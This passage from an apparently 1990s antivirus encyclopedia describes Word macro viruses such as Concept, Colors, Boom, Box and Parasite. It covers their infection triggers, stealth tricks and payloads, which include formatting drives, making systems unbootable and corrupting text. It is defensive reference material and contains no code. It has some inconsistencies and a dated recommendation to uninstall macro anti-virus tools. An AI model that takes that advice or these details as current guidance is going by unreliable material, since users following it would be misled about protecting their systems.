  17638. Bandung.A virus is the "AutoExec" macro.
  17639. Bandung.G contains only two lines. One line is empty and one
  17640. contains a "DisableAutoMacros" statement.
  17641.  
  17642. The payload replaces the letter "a" with "#@." This occurs
  17643. when the "ToolsCustomize" macro is called.
  17644.  
  17645. Bandung.G does not have the destructive payload from the
  17646. original Bandung.A virus.
  17647.  
  17648.  
  17649.  
  17650. [WORD_Bandung.I]
  17651. Virus name: WORD_Bandung.I
  17652. Virus Type: Word macro virus
  17653. Number of macros: 6
  17654. Encrypted: No
  17655. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17656.              ToolsMacro, ToolsCustomize
  17657. Size of macros: 1988 Bytes
  17658. Place of origin: Bandung, Indonesia
  17659. Date of origin: February 1997
  17660. Destructive: No
  17661. Seen In-The-Wild: No
  17662. Description:
  17663.  
  17664. The only difference between this new variant and the original
  17665. Bandung.A virus is the "AutoExec" macro.
  17666. Bandung.I contains only three lines from an anti-virus
  17667. solution, which disables all the automacros.
  17668.  
  17669. Bandung.I does not have the destructive payload from the
  17670. original Bandung.A virus.
  17671.  
  17672. For more information, please refer to the Bandung.A virus.
  17673.  
  17674.  
  17675.  
  17676. [WORD_Bertik.A]
  17677. Virus name: WORD_Bertik.A
  17678. Virus Type: Word macro virus
  17679. Number of macros: 5
  17680. Encrypted: Yes
  17681. Macro names: XXXAO, XXXFS, XXXFSA, Payload, AutoOpen
  17682.              (YYYAO, FileSave, FileSaveAs)
  17683. Size of macros: 2988 Bytes
  17684. Place of origin: Unknown
  17685. Date of origin: Spring 1997
  17686. Payload: Yes
  17687. Seen In-The-Wild: Yes
  17688. Description:
  17689.  
  17690. Bertik.A infects the global template (normal.dot) when an
  17691. infected document is opened. Further documents become
  17692. infected when they are also opened (AutoOpen) or saved
  17693. (FileSave and FileSaveAs).
  17694.  
  17695. Bertik is not destructive, it only copies the WINWORD.HLP file
  17696. to the templates directory. This happens whenever Bertik infects
  17697. a new document. During the process of copying,
  17698. WINWORD.HLP is renamed to number.WRD, where "number" increments
  17699. with each infection.
  17700.  
  17701. Due to the size of WINWORD.HLP, Bertik can fill up the hard drive
  17702. space.  After a Bertik infection, the templates directory should
  17703. be checked for "*.WRD" files.
  17704.  
  17705. Bertik also displays the following message when reaching a full
  17706. hard drive:
  17707.  
  17708. "   !!!Made by virus Bertik 1 !!!   "
  17709.  
  17710.  
  17711. [Word_Birthday.A:De (a.k.a. PCW)]
  17712. Virus name: Word_Birthday.A:De (a.k.a. PCW)
  17713. Virus Type: Word macro virus
  17714. Number of macros: 2
  17715. Encrypted: Yes
  17716. Macro names: AutoOpen, DateiSpeichernUnter
  17717. Size of macros: 1039 Bytes
  17718. Place of origin: German computer magazine
  17719. Date of origin: July 1996
  17720. Destructive: No
  17721. Common In-The-Wild: No
  17722. Description:
  17723.  
  17724. Birthday infects the global template (normal.dot) when an
  17725. infected document is opened. Further documents become
  17726. infected when the "DateiSpeichernUnter" command is used.
  17727.  
  17728. It displays the following message:
  17729.  
  17730. "   Happy Birthday! Herzlichen Glⁿckwunsch...  "
  17731.  
  17732.  
  17733. [WORD_Boom.A:De (a.k.a. Boombastic)]
  17734. Virus name: WORD_Boom.A:De (a.k.a. Boombastic)
  17735. Virus Type: Word macro virus
  17736. Number of macros: 4
  17737. Encrypted: Yes
  17738. Macro names: AutoExec, AutoOpen, DateiSpeichernUnter,
  17739.              System
  17740. Size of macros: 2863 Bytes
  17741. Place of origin: Germany
  17742. Date of origin: July 1996
  17743. Payload: Yes
  17744. Common In-The-Wild: Yes
  17745. Description:
  17746.  
  17747. Boom is the second macro virus written for the German
  17748. version of Microsoft Word.
  17749.  
  17750. Boom's destructive payload renames the menu structure of
  17751. Word to:
  17752.  
  17753. Datei       ->    Mr.Boombastic
  17754. Bearbeiten  ->    and
  17755. Ansicht     ->    Sir WIXALOT
  17756. Einfuegen   ->    are
  17757. Format      ->    watching
  17758. Extras      ->    you
  17759. Tabelle     ->    !
  17760. Fenster     ->    !
  17761. Hilfe       ->    !
  17762.  
  17763. A sound is send to the PC speaker during the renaming
  17764. process. After the menu change, Boom will create a new
  17765. global template and insert the following text:
  17766.  
  17767. "   Greetings from Mr. Boombastic and Sir WIXALOT !!!   "
  17768.  
  17769. "   Oskar L., wir kriegen dich!!!   "
  17770.  
  17771. "Dies ist eine Initiative des Institutes zur Vermeidung und
  17772. Verbreitung von "
  17773.  
  17774. "  Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen,
  17775. unter der   "
  17776.  
  17777. "               Schirmherrschaft von Rudi S. !                  "
  17778.  
  17779. Boom prints this text.
  17780.  
  17781. [WORD_Box.B]
  17782. Virus name: WORD_Box.B
  17783. Virus Type: Word macro virus
  17784. Number of macros: 7
  17785. Encrypted: Yes
  17786. Macro names: Box, Dead, AutoOpen, AutoClose, FilePrint,
  17787.              FilePrintDefault, ToolsMacro
  17788. Size of macros: 1988 Bytes
  17789. Place of origin: Taiwan
  17790. Date of origin: February 1997
  17791. Destructive: Yes
  17792. Seen In-The-Wild: No
  17793. Description:
  17794.  
  17795. Box.B infects the global template and further documents when
  17796. an infected document is opened (AutoOpen) or closed
  17797. (AutoClose).
  17798.  
  17799. Box.B uses "ToolsMacro" to make recognition of an infected
  17800. file more difficult (called macro stealth technique).
  17801.  
  17802. Box.B consists of several destructive payloads. One payload
  17803. formats the C:\ drive, another one drops the Dos-based virus
  17804. "One Half.3544".
  17805.  
  17806. A third payload displays the following messages and adds it to
  17807. printed documents:
  17808.  
  17809. "   Taiwan Super No. 1 Macro Virus   "
  17810. "   Twno1-S   "
  17811. "   Today is my Birthday   "
  17812.  
  17813. Box.B only works with the Chinese version of Microsoft Word.
  17814.  
  17815.  
  17816.  
  17817. [WORD_Buero.A (a.k.a Bureau, BuroNeu)]
  17818. Virus name: WORD_Buero.A (a.k.a Bureau, BuroNeu)
  17819. Virus Type: Word macro virus
  17820. Number of macros: 2
  17821. Encrypted: Yes
  17822. Macro names: AutoOpen (DateiSpeichern), BueroNeu
  17823. Size of macros: 697 Bytes
  17824. Place of origin: Germany
  17825. Date of origin: August 1996
  17826. Destructive: Yes
  17827. Common In-The-Wild: Yes
  17828. Description:
  17829.  
  17830. Buero is another macro virus written for the German version
  17831. of Microsoft Word.
  17832.  
  17833. Buero infects the global template (Normal.dot) when an
  17834. infected document is opened. Further documents become
  17835. infected with the "DateiSpeichern" (only in the global template)
  17836. command.
  17837.  
  17838. After August 15, 1996, Buero renames the system file
  17839. "IO.SYS" to "IIO.SYS." This action will leave the computer
  17840. unbootable.  The second destructive payload searches for
  17841. C:\*.DOC files and deletes them.
  17842.  
  17843.  
  17844. [WORD_Cap.a]
  17845. Virus name: WORD_Cap.a
  17846. Virus Type: Word macro virus
  17847. Number of macros: differs
  17848. Encrypted: Yes
  17849. Macro names: CAP
  17850. Size of macros: differs
  17851. Place of origin: Unknown
  17852. Date of origin: December 1996
  17853. Destructive: No
  17854. Common In-The-Wild: Yes
  17855. Description:
  17856.  
  17857. Cap.A is another complex macro virus that is able to spread
  17858. on various localized versions of Microsoft WORD_ While some
  17859. macros keep the same name, others are automatically assigned
  17860. new names from the localized version of Word.
  17861.  
  17862. When Cap.A infects the global template, it deletes all existing
  17863. macros. It infects the global template when an infected
  17864. document is opened.
  17865.  
  17866. Cap.A uses "ToolsMacro" and "FileTemplates" to make
  17867. recognition of an infected document more difficult (called
  17868. macro stealth technique).
  17869.  
  17870.  
  17871. [WORD_Cebu.A]
  17872. Virus name: WORD_Cebu.A
  17873. Virus Type: Word macro virus
  17874. Number of macros: 4 or more
  17875. Encrypted: Yes
  17876. Macro names: AutoOpen, AutoClose, AutoExec, MSRun
  17877. Size of macros: 1237 Bytes
  17878. Place of origin: Hong Kong
  17879. Date of origin: Spring 1997
  17880. Destructive: Yes
  17881. Seen In-The-Wild: No
  17882. Description:
  17883.  
  17884. Cebu infects the global template when an infected document is
  17885. opened. Further documents become infected when they are also
  17886. opened (AutoOpen) or closed (AutoClose).
  17887.  
  17888. When Cebu triggers (probability of 59/60), it replaces the word
  17889. " Asian " with the Word " Cebu ". This happens when Microsoft
  17890. Word is started (AutoExec) and sixty-four minutes later
  17891. (new probability: 2/15).
  17892.  
  17893. Cebu is one of the very few macro viruses that copies user macros,
  17894. therefore it can exist with 4 or more macros.
  17895. We recommend that you de-install the macro anti-virus solutions
  17896. (such as Scanprot) in order to prevent Cebu from snatching
  17897. macros.
  17898.  
  17899.  
  17900. [WORD_Cebu.B]
  17901. Virus name: WORD_Cebu.B
  17902. Virus Type: Word macro virus
  17903. Number of macros: 4 or more
  17904. Encrypted: Yes
  17905. Macro names: AutoOpen, AutoClose, AutoExec, MSRun
  17906. Size of macros: 1976 Bytes
  17907. Place of origin: Unknown
  17908. Date of origin: May 1997
  17909. Destructive: Yes
  17910. Seen In-The-Wild: No
  17911. Description:
  17912.  
  17913. Cebu.B infects the global template when an infected document
  17914. is opened. Further documents become infected when they are
  17915. also opened (AutoOpen) or closed (AutoClose).
  17916.  
  17917. The main difference between this new variant and the previous
  17918. Cebu.A virus is that Cebu.B has some modified codes and also
  17919. contains various bugs.
  17920.  
  17921. For more information, please refer to the Cebu.A virus description.
  17922.  
  17923.  
  17924. [WORD_Chaos.A]
  17925. Virus name: WORD_Chaos.A
  17926. Virus Type: Word macro virus
  17927. Number of macros: 4
  17928. Encrypted: Yes
  17929. Macro names: FileOpen (TempFileOpen), FileSave (TempFileSave),
  17930.              AutoExec (TempAutoExec), TempAutoOpen (AutoOpen)
  17931. Size of macros: 2810
  17932. Place of origin: Unknown
  17933. Date of origin: June, 1996
  17934. Destructive: Yes
  17935. Seen In-The-Wild: No
  17936. Description:
  17937.  
  17938. Chaos infects the global template when an infected file is
  17939. opened.  Further documents become infected when they
  17940. opened (FileOpen) or saved (FileSave).
  17941.  
  17942. Upon starting Word (AutoExec), Chaos puts the following text
  17943. string on the status bar: (users will recognize a delay)
  17944.  
  17945. "   number/500   "
  17946.  
  17947. When the random number on the left side reaches 500, Chaos tries
  17948. to halt the computer.
  17949.  
  17950.  
  17951. [WORD_Clock.A:De (a.k.a Extra)]
  17952. Virus name: WORD_Clock.A:De (a.k.a Extra)
  17953. Virus Type: Word macro virus
  17954. Number of macros: 11
  17955. Encrypted: Yes
  17956. Macro names: Action, AutoExec, AutoOpen, Extrasmakro,
  17957.              DateiSchliessen, Datumunduhrzeit, DateiDokVorlagen,
  17958.              Dateiallesspeichern, Oeffnen, Speichern
  17959. Size of macros: 3795 Bytes
  17960. Place of origin: USA
  17961. Date of origin: Summer 1996
  17962. Payload: Yes
  17963. Common In-The-Wild: No
  17964. Description:
  17965.  
  17966. Clock is another macro virus written for the German version of
  17967. Microsoft Word.
  17968.  
  17969. It uses "ExtrasMakro" and "DateiDokVorlagen" to make
  17970. recognition of an infected document more difficult (called
  17971. macro stealth technique).
  17972.  
  17973. When an infected document is opened after the 26th of each
  17974. month, Clock will display a window containing the time. It will
  17975. also activate one of its payloads, which sets the system clock
  17976. to a value of 33 in the seconds field. Clock does this every 2 to
  17977. 3 minutes, which results to a less accurate system clock.
  17978.  
  17979. The second payload will start in 1997. Clock will check the
  17980. system clock, and in case of a minute value smaller than 5, it
  17981. will flip the "FileOpen" and "FileSave" macros.
  17982.  
  17983. This will only happen on:
  17984.  
  17985. 1st of each month
  17986. 2nd of each month
  17987. 13th of each month
  17988. 21st of each month
  17989. 27th of each month
  17990.  
  17991. [WORD_Colors.A (a.k.a Rainbow)]
  17992. Virus name: WORD_Colors.A (a.k.a Rainbow)
  17993. Virus Type: Word macro virus
  17994. Number of macros: 9
  17995. Encrypted: Yes
  17996. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  17997.              FileSave, FileSaveAs, macros, ToolsMacro
  17998. Size of macros: 6470 Bytes
  17999. Place of origin: Portugal
  18000. Date of origin: Posted to Usenet in October 1995
  18001. Payload: Yes
  18002. Common In-The-Wild: Yes
  18003. Description:
  18004.  
  18005. Colors is the first macro virus that can still infect, even
  18006. when all the Auto-macros are turned off. It also uses
  18007. "ToolsMacro" to make recognition of an infected file more
  18008. difficult (called macro stealth technique).
  18009.  
  18010. Upon activation of one of its macros (all except for AutoExec),
  18011. Colors tries to infect the global template (normal.dot).
  18012. It checks if all its macros are already present in the global
  18013. template and if this is not the case, it transfers the virus macros
  18014. or replaces already existing ones.
  18015.  
  18016. The global template becomes infected when a document is
  18017. opened, saved, closed or Microsoft Word is exited. Further
  18018. documents become infected when a file is created (FileNew) or
  18019. saved (FileSave, FileSaveAs).
  18020.  
  18021. The destructive payload is located in the "macros" macro.
  18022. Once activated Colors creates a variable in the [Windows]
  18023. section of Win.ini with the name "countersu," which counts
  18024. upwards from zero. After each 300th call, Colors changes the
  18025. color palette of 21 Windows desktop elements.
  18026. Background, buttons and borders will have new randomly
  18027. selected colors, which will leave the user with a sometimes
  18028. unusual looking desktop.
  18029.  
  18030.  
  18031. [WORD_Colors.B (a.k.a Colo-b)]
  18032. Virus name: WORD_Colors.B (a.k.a Colo-b)
  18033. Virus Type: Word macro virus
  18034. Number of macros: 9
  18035. Encrypted: Yes
  18036. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18037.              FileSave, FileSaveAs, macros, ToolsMacro
  18038. Size of macros: 7006 Bytes
  18039. Place of origin: Portugal
  18040. Date of origin: April 1996
  18041. Payload: Yes
  18042. Common In-The-Wild: No
  18043. Description:
  18044.  
  18045. Colors.B seems to be a variant of the previously found Colors.A
  18046. virus.  All of the macros seem to be identical to Colors.A,
  18047. except for the "AutoOpen" macro, which seems to come from
  18048. the Concept virus. It looks like a Colors infected document
  18049. was re-infected with Concept, which replaced the "AutoOpen"
  18050. macro with its own.
  18051.  
  18052. Colors.B is still able to replicate, even though it has new virus
  18053. code from a different virus. Colors.B is the first virus that
  18054. combines virus codes from 2 different viruses (Colors.A and
  18055. Concept.A).
  18056.  
  18057.  
  18058. [WORD_Colors.C (a.k.a Colo-c)]
  18059. Virus name: WORD_Colors.C (a.k.a Colo-c)
  18060. Virus Type: Word macro virus
  18061. Number of macros: 9
  18062. Encrypted: Yes
  18063. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18064.              FileSave, FileSaveAs, macros, ToolsMacro
  18065. Size of macros: 6493 Bytes
  18066. Place of origin: Unknown
  18067. Date of origin: July 1996
  18068. Payload: Yes
  18069. Common In-The-Wild: No
  18070. Description:
  18071.  
  18072. Colors.C seems to be a corrupted variant of the previously found
  18073. Colors.A virus. The submitted virus sample infected the global
  18074. template (normal.dot) and new documents, yet the new
  18075. infected documents were unable to infect further documents.
  18076. Only the first generation was able to infect other files.
  18077.  
  18078. Colors.C is therefore very unlikely to survive.
  18079.  
  18080.  
  18081. [Word.Colors.D (a.k.a Colo-d)]
  18082. Virus name: WORD_Colors.D (a.k.a Colo-d)
  18083. Virus Type: Word macro virus
  18084. Number of macros: 9
  18085. Encrypted: Yes
  18086. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18087.              FileSave, FileSaveAs, macros, ToolsMacro
  18088. Size of macros: 19688 Bytes
  18089. Place of origin: Unknown
  18090. Date of origin: August 1996
  18091. Payload: Yes
  18092. Common In-The-Wild: No
  18093. Description:
  18094.  
  18095. Colors.D seems to be a combination of the previously found
  18096. Colors.A virus and the Microsoft macro virus solution "Scanprot".
  18097.  
  18098. Even though Colors.D has an anti-virus solution in its
  18099. code, it is still able to spread and infect the global template
  18100. (normal.dot) and further documents.
  18101.  
  18102.  
  18103. [WORD_Colors.E]
  18104. Virus name: WORD_Colors.E
  18105. Virus Type: Word macro virus
  18106. Number of macros: 9
  18107. Encrypted: Yes
  18108. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18109.              FileSave, FileSaveAs, Macros, ToolsMacro
  18110. Size of macros: 6290 Bytes
  18111. Place of origin: Unknown
  18112. Date of origin: Fall 1996
  18113. Destructive: No
  18114. Seen In-The-Wild: No
  18115. Description:
  18116.  
  18117. The only difference between this new variant and the original
  18118. Colors.A virus is that the "AutoOpen" macro has been replaced
  18119. with a harmless one. This has no effect on the virus. Colors.E is
  18120. still able to activate and infect further documents.
  18121.  
  18122.  
  18123. [WORD_Colors.F]
  18124. Virus name: Word.Colors.F
  18125. Virus Type: Word macro virus
  18126. Number of macros: 9
  18127. Encrypted: Yes
  18128. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18129.              FileSave, FileSaveAs, Macros, ToolsMacro
  18130. Size of macros: 6402 Bytes
  18131. Place of origin: Unknown
  18132. Date of origin: Fall 1996
  18133. Destructive: No
  18134. Seen In-The-Wild: No
  18135. Description:
  18136.  
  18137. The only difference between this new variant and the original
  18138. Colors.A virus is that the "AutoOpen" macro has been replaced
  18139. with a new one. This has no effect on the virus. Colors.F is
  18140. still able to activate and infect further documents.
  18141.  
  18142.  
  18143. [WORD_Colors.G]
  18144. Virus name: WORD_Colors.G
  18145. Virus Type: Word macro virus
  18146. Number of macros: 9
  18147. Encrypted: Yes
  18148. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew
  18149.              FileSave, FileSaveAs, Macros, ToolsMacro
  18150. Size of macros: 7006 Bytes
  18151. Place of origin: Unknown
  18152. Date of origin: January 1997
  18153. Destructive: No
  18154. Seen In-The-Wild: No
  18155. Description:
  18156.  
  18157. Colors.G is a minor variant of the older Colors.B virus.
  18158.  
  18159. The only difference between this new variant and Colors.B is
  18160. that the "AutoOpen" macro has been replaced with an encrypted
  18161. Concept macro. In addition, the "ToolsMacro" macro from
  18162. Colors.B is corrupted. Due to the virus code change, Colors.B
  18163. does not activate when an infected document is opened.
  18164.  
  18165. Colors.F uses "ToolsMacro" to make recognition of an infected
  18166. document more difficult (called macro stealth technique).
  18167.  
  18168. For more information, please refer to the Colors.A virus description.
  18169.  
  18170.  
  18171. [WORD_Colors.H]
  18172. Virus name: WORD_Colors.H
  18173. Virus Type: Word macro virus
  18174. Number of macros: 9
  18175. Encrypted: Yes
  18176. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18177.              FileSave, FileSaveAs, Macros, ToolsMacro
  18178. Size of macros: 9984 Bytes
  18179. Place of origin: Unknown
  18180. Date of origin: January 1997
  18181. Destructive: No
  18182. Seen In-The-Wild: No
  18183. Description:
  18184.  
  18185. Colors.H is a minor variant based on the older Colors.A virus
  18186. and the anti-virus macro solution "WWFix" from Datafellows.
  18187. Even though Colors.H has an anti-virus solution in its code, it
  18188. is still able to spread and infect further documents.
  18189.  
  18190. When an infected document is opened, the new AutoOpen
  18191. macro searches the system for the Concept virus. After the
  18192. scan it tries to install the protective macros, which are not
  18193. present.  As a result Colors.H displays the following error
  18194. message:
  18195.  
  18196. "   Document is not open   "
  18197.  
  18198. Colors.H uses "ToolsMacro" to make recognition of an infected
  18199. document more difficult (called macro stealth technique).
  18200.  
  18201. For more information, please refer to the Colors.A virus description.
  18202.  
  18203.  
  18204. [WORD_Colors.I]
  18205. Virus name: WORD_Colors.I
  18206. Virus Type: Word macro virus
  18207. Number of macros: 8
  18208. Encrypted: Yes
  18209. Macro names: AutoExec, AutoOpen, AutoClose, FileExit, FileSave,
  18210.              FileSaveAs, ToolsMacro, Macros
  18211. Size of macros: 6117 Bytes
  18212. Place of origin: Unknown
  18213. Date of origin: 1997
  18214. Destructive: No
  18215. Common In-The-Wild: No
  18216. Description:
  18217.  
  18218. Colors.I is a new variant based on the original Colors.A virus.
  18219. The main difference is the "AutoOpen" macro which was
  18220. probably snatched from another virus.
  18221. This new macro copies the "AutoOpen", "AutoClose" and
  18222. "FileSaveAs" macro to the global template instead of calling
  18223. the routines in the "macros" macro.
  18224. In addition, Colors.I does not have any "FileNew" macro.
  18225.  
  18226. Colors.I infects when an infected document is closed
  18227. (AutoClose), saved (FileSave and FileSaveAs) and when the
  18228. ToolsMacro command is used.
  18229.  
  18230. Colors.I uses "ToolsMacro" to make recognition of an infected
  18231. file more difficult (called macro stealth technique).
  18232.  
  18233. For more information, please refer to the Colors.A virus description.
  18234.  
  18235.  
  18236. [WORD_Color.J]
  18237. Virus name: WORD_Colors.J
  18238. Virus Type: Word macro virus
  18239. Number of macros: 9
  18240. Encrypted: Yes
  18241. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew
  18242.              FileSave, FileSaveAs, Macros, ToolsMacro
  18243. Size of macros: 6983 Bytes
  18244. Place of origin: Unknown
  18245. Date of origin: February 1997
  18246. Destructive: No
  18247. Seen In-The-Wild: No
  18248. Description:
  18249.  
  18250. Colors.J is a minor variant based on the older Colors.B virus.
  18251. The only difference between the two viruses is one line of
  18252. unimportant code.
  18253.  
  18254. Colors.J uses "ToolsMacro" to make recognition of an infected
  18255. document more difficult (called macro stealth technique).
  18256.  
  18257. For more information, please refer to the Colors.B virus description.
  18258.  
  18259.  
  18260. [WORD_Colors.K]
  18261. Virus name: WORD_Colors.K
  18262. Virus Type: Word macro virus
  18263. Number of macros: 9
  18264. Encrypted: Yes
  18265. Macro names: Macros, FileNew, AutoExec, AutoOpen, FileExit,
  18266.              FileSave, AutoClose, FileSaveAs, ToolsMacro
  18267. Size of macros: 6288 Bytes
  18268. Place of origin: Unknown
  18269. Date of origin: February 1997
  18270. Destructive: No
  18271. Common In-The-Wild: No
  18272. Description:
  18273.  
  18274. Colors.K is a new variant based on the original Colors.A virus.
  18275. The only difference between the two viruses is that the
  18276. "AutoOpen" macro, with only 3 lines, has been snatched from
  18277. another document.
  18278.  
  18279. For more information, please refer to the Colors.A virus description.
  18280.  
  18281.  
  18282. [Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)]
  18283. Virus name: Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)
  18284. Virus Type: Word macro virus
  18285. Number of macros: 4
  18286. Encrypted: No
  18287. Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
  18288. Size of macros: 1968 Bytes
  18289. Place of origin: USA
  18290. Date of origin: July 1995
  18291. Destructive:  No
  18292. Common In-The-Wild: Yes
  18293. Description:
  18294.  
  18295. Concept was the first macro virus found "In-the-Wild." It was
  18296. discovered in July-August 1995 and is now the most common
  18297. virus.
  18298.  
  18299. Concept activates when an infected document is opened
  18300. (AutoOpen).  Upon activation, Concept checks for a previous
  18301. infection of the global template (normal.dot). If none of the
  18302. macros are present, Concept copies its virus macros.
  18303. The "AAAZFS" macro is saved under the name "FileSaveAs."
  18304.  
  18305. After infecting the global template, Concept makes an entry in
  18306. the Win.ini file. It sets "WW6I=1" and displays a window with
  18307. a "1" in it.
  18308.  
  18309. Concept does not contain any destructive payload, even
  18310. though is has a macro with the name "Payload." The "Payload"
  18311. macro is empty except for the following text:
  18312.  
  18313. "   That's enough to prove my point   "
  18314.  
  18315.  
  18316. [WORD_Concept.B]
  18317. Virus name: WORD_Concept.B
  18318. Virus Type: Word macro virus
  18319. Number of macros: 4
  18320. Encrypted: No
  18321. Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
  18322. Size of macros: 2016 Bytes
  18323. Place of origin: France
  18324. Date of origin: Spring 1996
  18325. Destructive: No
  18326. Common In-The-Wild: Yes
  18327. Description:
  18328.  
  18329. The only difference between Concept.A and Concept.B is that
  18330. the virus author translated the "FileSaveAs" macro into its
  18331. French equivalent.  Therefore this new variant only works with
  18332. the French version of Microsoft Word.
  18333.  
  18334.  
  18335.  
  18336. [WORD_Concept.C]
  18337. Virus name: WORD_Concept.C
  18338. Virus Type: Word macro virus
  18339. Number of macros: 4
  18340. Encrypted: No
  18341. Macro names: AutoOpen, F1, F2, Boom, FileSaveAs
  18342. Size of macros: 1834 Bytes in .doc files
  18343.                 1559 Bytes in .dot files
  18344. Place of origin: Unknown
  18345. Date of origin: Summer 1996
  18346. Destructive: No
  18347. Common In-The-Wild: No
  18348. Description:
  18349.  
  18350. The difference between this new variant and the original
  18351. Concept virus can be found in the macro names and the
  18352. contents of the "Boom" macro.  Concept.C activates when an
  18353. infected document is opened (AutoOpen).
  18354. Further documents become infected when they are saved with
  18355. the "FileSaveAs" command.
  18356.  
  18357. Concept.C displays a message box with a " 1 " in it.
  18358.  
  18359. The "Boom" macro contains another message, yet not
  18360. displayed:
  18361.  
  18362. "   Fight racism; Smash Fascizm   "
  18363.  
  18364.  
  18365.  
  18366. [WORD_Concept.D]
  18367. Virus name: WORD_Concept.D (a.k.a. Haha)
  18368. Virus Type: Word macro virus
  18369. Number of macros: 4
  18370. Encrypted: 3 of the 4 macros
  18371. Macro names: AutoOpen (FileSaveAs), EditSize, FileSort, HaHa
  18372. Size of macros: 2129 Bytes in .doc files
  18373.                 2041 Bytes in .dot files
  18374. Place of origin: Unknown
  18375. Date of origin: Summer 1996
  18376. Payload     Yes
  18377. Common In-The-Wild: No
  18378. Description:
  18379.  
  18380. Concept.D activates when an infected file is opened
  18381. (AutoOpen).  Further documents become infected when they
  18382. are saved with the FileSaveAs command.
  18383.  
  18384. Upon infection of a new document, Concept.D changes the
  18385. font color of all the existing text to white, which creates the
  18386. impression that all the text disappeared (or was deleted).
  18387. Concept.D then adds the following text to the active document:
  18388.  
  18389. " i said: say goodbye to all your stuff (look at that hard drive
  18390. spin!). "
  18391.  
  18392. Upon an attempt to save an infected document, Concept.D
  18393. tries to save the document 100 times, causing an irregular
  18394. disk activity.
  18395.  
  18396.  
  18397.  
  18398. [WORD_Concept.E]
  18399. Virus name: WORD_Concept.E
  18400. Virus Type: Word macro virus
  18401. Number of macros: 4
  18402. Encrypted: No
  18403. Macro names: AutoOpen (FileSaveAs), AAAZAO, AAAZFS, Load
  18404. Size of macros: 1657 Bytes in .doc files
  18405.                 1472 Bytes in .dot files
  18406. Place of origin: Unknown
  18407. Date of origin: Summer 1996
  18408. Payload             Yes
  18409. Common In-The-Wild: No
  18410. Description:
  18411.  
  18412. The difference between this new variant and the original
  18413. Concept virus can be found in the names of the macros and the
  18414. contents of the "Load" macro.
  18415. Concept.E activates when an infected document is opened
  18416. (AutoOpen).  Further documents become infected when they
  18417. are saved with the FileSaveAs command.
  18418.  
  18419. Upon infection of a new document, Concept.E displays a
  18420. message with a " 1 " in it.
  18421.  
  18422. Concept.E also has a virus code that tries to save the active
  18423. document in the T:\VIR directory.
  18424.  
  18425.  
  18426. [WORD_Concept.F (a.k.a. Parasite 1.0, P-Site)]
  18427. Virus name: WORD_Concept.F (a.k.a. Parasite 1.0, P-Site)
  18428. Virus Type: Word macro virus
  18429. Alias: WORD_Parasite
  18430. Number of macros: 7
  18431. Encrypted: Yes
  18432. Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
  18433. Size of macros: 3673 Bytes in .doc files
  18434.                 3453 Bytes in .dot files
  18435. Place of origin: USA
  18436. Date of origin: July 1996
  18437. Destructive: Yes
  18438. Common In-The-Wild: Yes
  18439. Description:
  18440.  
  18441. Concept.F has various payloads. The first one replaces the
  18442. following words in infected documents:
  18443.  
  18444. "and" with "not".
  18445.  
  18446. The second payload is a little bit more comprehensive.
  18447. Concept.F checks the system time for a specific value in the
  18448. days section. In case of a 16 (16th of each month), it activates
  18449. its payloads. It then replaces the following letters/words in
  18450. infected documents:
  18451.  
  18452. "." (dot) with "," (comma)
  18453.  
  18454. "and" with "not"
  18455.  
  18456. "a" with an "e"
  18457.  
  18458. This new Concept variant also displays the following window:
  18459.  
  18460. "   Parasite Virus 1.0   "
  18461.  
  18462. "   Your computer is infected with the Parasite Virus, Version 1.0!   "
  18463.  
  18464.  
  18465. [WORD_Parasite]
  18466. Virus name: WORD_Parasite
  18467. Virus Type: Word macro virus
  18468. Alias: WORD_Concept.AD/F/F2/G/J/T/U
  18469. Number of macros: 7
  18470. Encrypted: Yes
  18471. Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
  18472. Size of macros: 3673 Bytes in .doc files
  18473.                 3453 Bytes in .dot files
  18474. Place of origin: USA
  18475. Date of origin: July 1996
  18476. Destructive: Yes
  18477. Common In-The-Wild: Yes
  18478. Description:
  18479.  
  18480. Parasite has various payloads. The first one replaces the
  18481. following words in infected documents:
  18482.  
  18483. "and" with "not".
  18484.  
  18485. The second payload is a little bit more comprehensive.
  18486. Parasite checks the system time for a specific value in the
  18487. Day field. In case of a 16 (16th of each month), it activates
  18488. its payloads. It then replaces the following letters/words in
  18489. infected documents:
  18490.  
  18491. "." (dot) with "," (comma)
  18492.  
  18493. "and" with "not"
  18494.  
  18495. "a" with an "e"
  18496.  
  18497. This virus also displays the following window:
  18498.  
  18499. "   Parasite Virus 1.0   "
  18500.  
  18501. "   Your computer is infected with the Parasite Virus, Version 1.0!   "
  18502.  
  18503.  
  18504. [WORD_Concept.G (a.k.a. Parasite 0.8, P-Site)]
  18505. Virus name: WORD_Concept.G (a.k.a. Parasite 0.8, P-Site)
  18506. Virus Type: Word macro virus
  18507. Number of macros: 7
  18508. Encrypted: Yes
  18509. Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen
  18510. Size of macros: 3670 Bytes in .doc files
  18511.                 3450 Bytes in .dot files
  18512. Place of origin: USA
  18513. Date of origin: July/August 1996
  18514. Destructive: Yes
  18515. Common In-The-Wild: No
  18516. Description:
  18517.  
  18518. According to the Concept.G virus code, this new variant is a
  18519. beta release of the Concept.F (version 1.0) virus.
  18520. Concept.G has various payloads. The first one replaces the
  18521. following words in infected documents:
  18522.  
  18523. "and" with "not"
  18524.  
  18525. The second payload is a little bit more comprehensive. Concept.G
  18526. checks the system time for a specific value in the days section.
  18527. In case of a 16 (every 16th of the month) it activates its payloads.
  18528. It then replaces the following letters/word in infected documents:
  18529.  
  18530. "." (dot) with "," (comma)
  18531.  
  18532. "and" with "not"
  18533.  
